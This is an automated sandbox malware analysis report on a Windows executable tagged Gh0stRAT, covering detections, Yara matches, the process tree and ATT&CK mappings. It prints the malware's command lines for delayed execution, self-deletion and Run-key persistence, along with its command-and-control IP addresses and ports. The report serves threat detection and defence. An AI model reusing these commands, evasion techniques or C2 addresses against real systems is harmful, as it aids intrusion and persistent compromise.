Windows Analysis Report
02hNixBIvP.exe

Overview

General Information

Sample Name: 02hNixBIvP.exe
Analysis ID: 801466
MD5: 003f93a1f33ec617b46a87c98b19fd85
SHA1: cebe846ccb643f8f843206d52cd701b02c1708f3
SHA256: 3c096962f3f447b1a0d136c730f0d979faafb01f22eddedccfc801bc167e0925
Tags: exe, Gh0stRAT
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Deletes itself after installation
Machine Learning detection for dropped file
Queries disk data (e.g. SMART data)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality for execution timing, often used to detect debuggers
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Queries information about the installed CPU (vendor, model number etc)
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Dropped file seen in connection with other malware
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • 02hNixBIvP.exe (PID: 3332 cmdline: C:\Users\user\Desktop\02hNixBIvP.exe MD5: 003F93A1F33EC617B46A87C98B19FD85)
    • cmd.exe (PID: 5212 cmdline: cmd.exe /c ping 127.0.0.1 -n 2&C:\Users\user\AppData\Local\Temp\\ifaie.exe "C:\Users\user\Desktop\02hNixBIvP.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 2244 cmdline: ping 127.0.0.1 -n 2 MD5: 70C24A306F768936563ABDADB9CA9108)
      • ifaie.exe (PID: 5244 cmdline: C:\Users\user\AppData\Local\Temp\\ifaie.exe "C:\Users\user\Desktop\02hNixBIvP.exe" MD5: A14885E3017A4DDC08143092526DFC7B)
        • hcl.exe (PID: 4908 cmdline: "c:\Program Files\lhnfbdjfh\hcl.exe" "c:\Program Files\lhnfbdjfh\hclyc.dll",Hlink C:\Users\user\AppData\Local\Temp\ifaie.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • hcl.exe (PID: 6452 cmdline: "C:\Program Files\lhnfbdjfh\hcl.exe" "c:\Program Files\lhnfbdjfh\hclyc.dll",Hlink MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • cmd.exe (PID: 6480 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\Program Files\lhnfbdjfh" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 6520 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
  • hcl.exe (PID: 6588 cmdline: "C:\Program Files\lhnfbdjfh\hcl.exe" "c:\Program Files\lhnfbdjfh\hclyc.dll",Hlink MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • cmd.exe (PID: 6616 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\Program Files\lhnfbdjfh" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 6664 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
02hNixBIvP.exe | CN_Honker_Webshell | Sample from CN Honker Pentest Toolset - file Webshell.exe | Florian Roth (Nextron Systems)
  • 0x3cf91:$s1: Windows NT users: Please note that having the WinIce/SoftIce
  • 0x3cc23:$s2: Do you want to cancel the file download?
  • 0x3d07b:$s3: Downloading: %s
Source | Rule | Description | Author | Strings
C:\Program Files\lhnfbdjfh\hclyc.dll | Winnti_NlaifSvc | Winnti sample - file NlaifSvc.dll | Florian Roth (Nextron Systems)
  • 0xa6ae:$x1: cracked by ximo
  • 0xe1b3:$x1: cracked by ximo
C:\Users\user\AppData\Local\Temp\ifaie.exe | CN_Honker_Webshell | Sample from CN Honker Pentest Toolset - file Webshell.exe | Florian Roth (Nextron Systems)
  • 0x3cf91:$s1: Windows NT users: Please note that having the WinIce/SoftIce
  • 0x3cc23:$s2: Do you want to cancel the file download?
  • 0x3d07b:$s3: Downloading: %s
Source | Rule | Description | Author | Strings
5.2.hcl.exe.10000000.1.unpack | Winnti_NlaifSvc | Winnti sample - file NlaifSvc.dll | Florian Roth (Nextron Systems)
  • 0x30ab2:$x1: cracked by ximo
  • 0x30b6c:$x1: cracked by ximo
  • 0x30c26:$x1: cracked by ximo
  • 0x30ce0:$x1: cracked by ximo
  • 0x30d9a:$x1: cracked by ximo
  • 0x30e54:$x1: cracked by ximo
  • 0x30f0e:$x1: cracked by ximo
  • 0x30fc8:$x1: cracked by ximo
  • 0x3c38d:$x1: cracked by ximo
  • 0x3fe92:$x1: cracked by ximo
4.2.ifaie.exe.400000.0.unpack | Winnti_NlaifSvc | Winnti sample - file NlaifSvc.dll | Florian Roth (Nextron Systems)
  • 0x28fae:$x1: cracked by ximo
  • 0x2cab3:$x1: cracked by ximo
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: 02hNixBIvP.exe, ReversingLabs: Detection: 92%
Source: 02hNixBIvP.exe, Virustotal: Detection: 78%
Source: 02hNixBIvP.exe, Avira: detected
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Program Files\lhnfbdjfh\hclyc.dll, Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: 02hNixBIvP.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Joe Sandbox ML: detected
Source: C:\Program Files\lhnfbdjfh\hclyc.dll, Joe Sandbox ML: detected
Source: 4.0.ifaie.exe.400000.0.unpack, Avira: Label: ADSPY/AdSpy.Gen
Source: 0.0.02hNixBIvP.exe.400000.0.unpack, Avira: Label: ADSPY/AdSpy.Gen
Source: 02hNixBIvP.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Directory created: c:\Program Files\lhnfbdjfh
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Directory created: c:\Program Files\lhnfbdjfh\hclyc.dll
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Directory created: c:\Program Files\lhnfbdjfh\hcl.exe
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Directory created: c:\Program Files\lhnfbdjfh\12032311
Source: Binary string: rundll32.pdb source: hcl.exe, 00000005.00000002.524559673.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe, 00000011.00000002.341464281.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe, 00000015.00000000.354210355.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe.4.dr
Source: Binary string: rundll32.pdbGCTL source: hcl.exe, 00000005.00000002.524559673.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe, 00000011.00000002.341464281.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe, 00000015.00000000.354210355.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe.4.dr
Source: C:\Program Files\lhnfbdjfh\hcl.exe, File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\microsoft.system.package.metadata\
Source: C:\Program Files\lhnfbdjfh\hcl.exe, File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\
Source: C:\Program Files\lhnfbdjfh\hcl.exe, File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\
Source: C:\Program Files\lhnfbdjfh\hcl.exe, File opened: C:\Program Files\WindowsApps\Deleted\
Source: C:\Program Files\lhnfbdjfh\hcl.exe, File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\AppTiles\
Source: C:\Program Files\lhnfbdjfh\hcl.exe, File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\

Networking

Source: global traffic, TCP traffic: 107.163.56.232 ports 18963,1,3,6,8,9
Source: global traffic, TCP traffic: 107.163.56.231 ports 18530,0,1,3,5,8
Source: global traffic, TCP traffic: 107.163.56.110 ports 18530,0,1,3,5,8
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: global traffic, TCP traffic: 192.168.2.3:49702 -> 202.108.0.52:80
Source: global traffic, TCP traffic: 192.168.2.3:49695 -> 107.163.56.231:18530
Source: global traffic, TCP traffic: 192.168.2.3:49696 -> 107.163.56.110:18530
Source: global traffic, TCP traffic: 192.168.2.3:49698 -> 107.163.56.251:6658
Source: global traffic, TCP traffic: 192.168.2.3:49699 -> 107.163.56.232:18963
Source: unknown, TCP traffic detected without corresponding DNS query: 107.163.56.231
Source: unknown, TCP traffic detected without corresponding DNS query: 107.163.56.110
Source: unknown, TCP traffic detected without corresponding DNS query: 107.163.56.251
Source: unknown, TCP traffic detected without corresponding DNS query: 107.163.56.232
Source: unknown, DNS traffic detected: queries for: blog.sina.com.cn

System Summary

Source: 5.2.hcl.exe.10000000.1.unpack, type: UNPACKEDPE, Matched rule: Winnti sample - file NlaifSvc.dll, Author: Florian Roth (Nextron Systems)
Source: 4.2.ifaie.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Winnti sample - file NlaifSvc.dll, Author: Florian Roth (Nextron Systems)
Source: C:\Program Files\lhnfbdjfh\hclyc.dll, type: DROPPED, Matched rule: Winnti sample - file NlaifSvc.dll, Author: Florian Roth (Nextron Systems)
Source: 02hNixBIvP.exe, type: SAMPLE, Matched rule: CN_Honker_Webshell date = 2015-06-23, author = Florian Roth (Nextron Systems), description = Sample from CN Honker Pentest Toolset - file Webshell.exe, score = c85bd09d241c2a75b4e4301091aa11ddd5ad6d59, reference = Disclosed CN Honker Pentest Toolset, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.2.hcl.exe.10000000.1.unpack, type: UNPACKEDPE, Matched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth (Nextron Systems), description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.ifaie.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth (Nextron Systems), description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Program Files\lhnfbdjfh\hclyc.dll, type: DROPPED, Matched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth (Nextron Systems), description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, type: DROPPED, Matched rule: CN_Honker_Webshell date = 2015-06-23, author = Florian Roth (Nextron Systems), description = Sample from CN Honker Pentest Toolset - file Webshell.exe, score = c85bd09d241c2a75b4e4301091aa11ddd5ad6d59, reference = Disclosed CN Honker Pentest Toolset, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\Desktop\02hNixBIvP.exe, Code function: String function: 004153D0 appears 120 times
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Code function: String function: 004153D0 appears 120 times
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Process Stats: CPU usage > 98%
Source: Joe Sandbox View, Dropped File: C:\Program Files\lhnfbdjfh\hcl.exe 4E15AA13A02798E924C63537E458A09415C48DAE0E7AFD5A3D25532A2AA935EE
Source: C:\Users\user\Desktop\02hNixBIvP.exe, File read: C:\Users\user\Desktop\02hNixBIvP.exe
Source: C:\Users\user\Desktop\02hNixBIvP.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown, Process created: C:\Users\user\Desktop\02hNixBIvP.exe C:\Users\user\Desktop\02hNixBIvP.exe
Source: C:\Users\user\Desktop\02hNixBIvP.exe, Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 2&C:\Users\user\AppData\Local\Temp\\ifaie.exe "C:\Users\user\Desktop\02hNixBIvP.exe"
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Users\user\AppData\Local\Temp\ifaie.exe C:\Users\user\AppData\Local\Temp\\ifaie.exe "C:\Users\user\Desktop\02hNixBIvP.exe"
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Process created: C:\Program Files\lhnfbdjfh\hcl.exe "c:\Program Files\lhnfbdjfh\hcl.exe" "c:\Program Files\lhnfbdjfh\hclyc.dll",Hlink C:\Users\user\AppData\Local\Temp\ifaie.exe
Source: unknown, Process created: C:\Program Files\lhnfbdjfh\hcl.exe "C:\Program Files\lhnfbdjfh\hcl.exe" "c:\Program Files\lhnfbdjfh\hclyc.dll",Hlink
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\Program Files\lhnfbdjfh"
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown, Process created: C:\Program Files\lhnfbdjfh\hcl.exe "C:\Program Files\lhnfbdjfh\hcl.exe" "c:\Program Files\lhnfbdjfh\hclyc.dll",Hlink
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\Program Files\lhnfbdjfh"
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\02hNixBIvP.exe, File created: C:\Users\user\AppData\Local\Temp\ifaie.exe
Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@22/4@23/6
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Mutant created: \Sessions\1\BaseNamedObjects\107.163.56.251:6658
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Mutant created: \Sessions\1\BaseNamedObjects\0x5d65r455f
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Mutant created: \Sessions\1\BaseNamedObjects\M107.163.56.251:6658
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_01
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_01
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_01
Source: C:\Users\user\Desktop\02hNixBIvP.exe, Code function: 0_2_004013B9 FindResourceA,LoadResource, 0_2_004013B9
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, File created: c:\Program Files\lhnfbdjfh
Source: C:\Program Files\lhnfbdjfh\hcl.exe, File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder, Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Directory created: c:\Program Files\lhnfbdjfh
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Directory created: c:\Program Files\lhnfbdjfh\hclyc.dll
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Directory created: c:\Program Files\lhnfbdjfh\hcl.exe
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Directory created: c:\Program Files\lhnfbdjfh\12032311
Source: Binary string: rundll32.pdb source: hcl.exe, 00000005.00000002.524559673.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe, 00000011.00000002.341464281.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe, 00000015.00000000.354210355.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe.4.dr
Source: Binary string: rundll32.pdbGCTL source: hcl.exe, 00000005.00000002.524559673.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe, 00000011.00000002.341464281.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe, 00000015.00000000.354210355.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, hcl.exe.4.dr
Source: C:\Users\user\Desktop\02hNixBIvP.exe, Code function: 0_2_00415390 push eax; ret 0_2_004153BE
Source: C:\Users\user\Desktop\02hNixBIvP.exe, Code function: 0_2_00417CC8 push ds; retf 0_2_00417CC9
Source: C:\Users\user\Desktop\02hNixBIvP.exe, Code function: 0_2_00417ED8 pushad ; retn 0040h 0_2_00417ED9
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Code function: 4_2_0042725C push ecx; ret 4_2_0042725E
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Code function: 4_2_00428280 push dword ptr [esp+28h]; retn 002Ch 4_2_00429F26
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Code function: 4_2_00415390 push eax; ret 4_2_004153BE
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Code function: 4_2_00427AE4 pushfd ; mov dword ptr [esp], 4876F1E8h 4_2_0044BBDB
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Code function: 4_2_00417CC8 push ds; retf 4_2_00417CC9
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Code function: 4_2_00417ED8 pushad ; retn 0040h 4_2_00417ED9
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Code function: 4_2_0044BFB8 push dword ptr [esp+40h]; retn 0044h 4_2_0044BFDC
Source: 02hNixBIvP.exe, Static PE information: section name: DINGBOY
Source: ifaie.exe.0.dr, Static PE information: section name: DINGBOY
Source: hclyc.dll.4.dr, Static PE information: section name: .oo0
Source: hclyc.dll.4.dr, Static PE information: section name: .oo1
Source: hcl.exe.4.dr, Static PE information: section name: .didat
Source: initial sample, Static PE information: section where entry point is pointing to: DINGBOY
Source: initial sample, Static PE information: section name: DINGBOY entropy: 7.909826423981474
Source: initial sample, Static PE information: section name: .oo1 entropy: 7.863884058526312
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, File created: C:\Program Files\lhnfbdjfh\hcl.exe
Source: C:\Users\user\Desktop\02hNixBIvP.exe, File created: C:\Users\user\AppData\Local\Temp\ifaie.exe
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, File created: C:\Program Files\lhnfbdjfh\hclyc.dll
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Hali

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, File deleted: c:\users\user\desktop\02hnixbivp.exe
Source: C:\Users\user\Desktop\02hNixBIvP.exe, Code function: 0_2_00401A9F IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon, 0_2_00401A9F
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Code function: 4_2_00401A9F IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon, 4_2_00401A9F
Source: C:\Users\user\Desktop\02hNixBIvP.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 3508, Thread sleep count: 36 > 30
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 5176, Thread sleep count: 248 > 30
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 5176, Thread sleep time: -446400000s >= -30000s
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 5208, Thread sleep time: -600000s >= -30000s
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 6348, Thread sleep time: -600000s >= -30000s
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 6352, Thread sleep time: -1200000s >= -30000s
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 6392, Thread sleep time: -1980000s >= -30000s
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 6380, Thread sleep time: -4800000s >= -30000s
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 6544, Thread sleep count: 231 > 30
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 6544, Thread sleep time: -69300000s >= -30000s
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 6312, Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 6316, Thread sleep time: -3600000s >= -30000s
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 5208, Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 5176, Thread sleep time: -1800000s >= -30000s
Source: C:\Program Files\lhnfbdjfh\hcl.exe TID: 6544, Thread sleep time: -300000s >= -30000s
Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Code function: 4_2_0044AB60 rdtsc 4_2_0044AB60
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Thread delayed: delay time: 1800000
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Thread delayed: delay time: 600000
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Thread delayed: delay time: 600000
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Thread delayed: delay time: 600000
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Thread delayed: delay time: 180000
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Thread delayed: delay time: 600000
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Thread delayed: delay time: 300000
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Thread delayed: delay time: 3600000
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Thread delayed: delay time: 922337203685477
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Thread delayed: delay time: 1800000
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Thread delayed: delay time: 300000
Source: C:\Program Files\lhnfbdjfh\hcl.exe, File opened: PHYSICALDRIVE0
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\02hNixBIvP.exe, Code function: 0_2_00414FFF VirtualQuery,GetSystemInfo,VirtualFree,VirtualAlloc,VirtualProtect, 0_2_00414FFF
Source: C:\Users\user\Desktop\02hNixBIvP.exe, API call chain: ExitProcess graph end node graph_0-10637
Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, API call chain: ExitProcess graph end node graph_4-10886
Source: C:\Program Files\lhnfbdjfh\hcl.exe, File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\microsoft.system.package.metadata\
Source: C:\Program Files\lhnfbdjfh\hcl.exe, File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\
Source: C:\Program Files\lhnfbdjfh\hcl.exe, File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\
Source: C:\Program Files\lhnfbdjfh\hcl.exe, File opened: C:\Program Files\WindowsApps\Deleted\
Source: C:\Program Files\lhnfbdjfh\hcl.exe, File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\AppTiles\
Source: C:\Program Files\lhnfbdjfh\hcl.exe, File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\
Source: hcl.exe, 00000005.00000002.524725974.000000000269B000.00000004.00000010.00020000.00000000.sdmp, Binary or memory string: s\Applications\\VMwareHo
Source: hcl.exe, 00000005.00000003.327430879.0000000002BD7000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: y\Machine\Software\Classes\Applications\\VMwareHostOpen.exes\Applications\\VMwareHostOpen.exeion\\Run\User Shell Foldersockdown_Zones\4
Source: hcl.exe, 00000005.00000002.524951045.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
Source: hcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: 107.163.56.232OW64\WindowsPowerShell\v1.0\Modules\Hyper-V\*.*{
Source: hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAWindows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmd.exe, Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\lhnfbdjfh\hcl.exe, Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\02hNixBIvP.exe, Code function: 0_2_004150B3 GetVersionExA, 0_2_004150B3

Stealing of Sensitive Information

Source: C:\Program Files\lhnfbdjfh\hcl.exe, Device IO: \Device\Harddisk0\DR0
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation | 1 Registry Run Keys / Startup Folder | 11 Process Injection | 2 Masquerading | OS Credential Dumping | 21 Security Software Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Non-Standard Port | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Registry Run Keys / Startup Folder | 31 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
